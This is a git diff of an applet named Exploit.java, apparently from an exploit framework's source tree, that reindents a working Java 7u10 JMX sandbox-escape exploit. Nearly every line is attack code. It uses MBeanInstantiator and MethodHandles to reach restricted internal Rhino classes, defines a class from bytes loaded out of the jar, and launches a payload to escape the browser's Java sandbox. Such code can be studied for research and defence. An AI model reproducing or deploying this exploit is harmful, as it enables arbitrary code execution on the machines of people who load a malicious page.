diff --git a/external/source/exploits/j7u10_jmx/Exploit.java b/external/source/exploits/j7u10_jmx/Exploit.java index f35c8ee469..3402631a92 100755 --- a/external/source/exploits/j7u10_jmx/Exploit.java +++ b/external/source/exploits/j7u10_jmx/Exploit.java @@ -27,40 +27,40 @@ public class Exploit extends Applet { try { - ByteArrayOutputStream bos = new ByteArrayOutputStream(); - byte[] buffer = new byte[8192]; - int length; + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + byte[] buffer = new byte[8192]; + int length; + + // read in the class file from the jar + InputStream is = getClass().getResourceAsStream("B.class"); + // and write it out to the byte array stream + while( ( length = is.read( buffer ) ) > 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); + JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null); + MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator(); + ClassLoader a = null; + Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a); + Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); + MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); + MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); + MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); + MethodType localMethodType2 = MethodType.methodType(Void.TYPE); + MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); + Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); + MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); + MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); + MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); + MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); + Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); + MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); + MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); + Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer }); + localClass3.newInstance(); - // read in the class file from the jar - InputStream is = getClass().getResourceAsStream("B.class"); - // and write it out to the byte array stream - while( ( length = is.read( buffer ) ) > 0 ) - bos.write( buffer, 0, length ); - // convert it to a simple byte array - buffer = bos.toByteArray(); - - JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); - JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null); - MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator(); - ClassLoader a = null; - Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a); - Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); - MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); - MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); - MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); - MethodType localMethodType2 = MethodType.methodType(Void.TYPE); - MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); - Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); - MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); - MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); - MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); - MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); - Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); - MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); - MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); - Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer }); - localClass3.newInstance(); - Payload.main(null); //Runtime.getRuntime().exec("calc.exe"); }